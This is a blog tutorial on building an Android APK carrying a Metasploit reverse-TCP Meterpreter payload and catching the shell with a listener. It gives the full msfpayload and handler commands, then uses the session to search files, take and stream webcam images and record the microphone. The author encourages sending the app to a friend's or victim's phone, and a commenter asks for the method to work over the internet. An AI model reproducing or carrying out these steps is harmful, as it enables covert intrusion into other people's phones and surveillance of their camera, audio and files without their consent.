Tuesday, February 16, 2016

How to access a Remote Shell on an Android using Metasploit

How to access a Remote Shell on an Android Phone using Metasploit

You will need ...

  • Linux Based System
  • A brain :) 
  • Knowledge of linux or maybe not....

To begin the process , we need to create an APK that will incorporate a remote shell. To do such, we will utilize the msfpayload command from Metasploit.

In Kali Linux (what i will be using) , fire up a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > app.apk

The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file or application with it. You will need to put your Kali Linux IP address in for the LHOST address highlighted in BOLD . You may want to change the port address also if you please.

Once this is executed, a file called “app.apk” will be created on the desktop:

Now just send this file to your Android device or device you wanna hack maybe your friends phone ;) , I used a Samsung Android Phone in this case.

Next we got to set Metasploit up to listen for all incoming connections.

In Kali OS  , start Metasploit from the menu or by executing “msfconsole” in a Terminal window.

Once Metasploit fires up, type the following commands to create a listener:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST (enter your Kali IP address)
set LPORT 4444 (your choice between ports 2834 and 4500 )
And to start the handler type exploit

When you run the app on your Android device or victims runs it. It will pop up as a large “M” icon with “Main Activity”or something of that sort.

 A large button will appear on your phone that displays, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metaploit Framework you should see this:

An active session as shown is already created and it leads you automatically into a meterpreter prompt / command interface.

 From there your can type ~sysinfo~ and device information will be displayed to you also you can type "ps" and the processes running will be displayed.

Typing “help” at a meterpreter prompt will list all the command that are available.

Amazing stuff you can with your running meterpreter session

Search for a file

meterpreter > search –f *.mp4

Take photos using the devices cameras

First list all the webcams that are available:

meterpreter > webcam_list

You can now run the webcam_snap command, by default it takes a photo using the first camera:

meterpreter > webcam_snap

If you want to take a photo using the second camera

meterpreter > webcam_snap –I 2

Record sound with the microphone

Run the record_mic command:

meterpreter > record_mic 5

Audio saved to: /root/JxltdUyn.wav

Run the following command to stream from the second camera:

meterpreter > webcam_stream –I 2

Any Issue or thing you dont understand feel free to comment below ... Thanks 

2 on: "How to access a Remote Shell on an Android using Metasploit"
  1. please help to do this in WAN.plzzzzzzzzzzzzzzzzzzzz

  2. It will be posted here soon thanks for the suggestion its appreciated.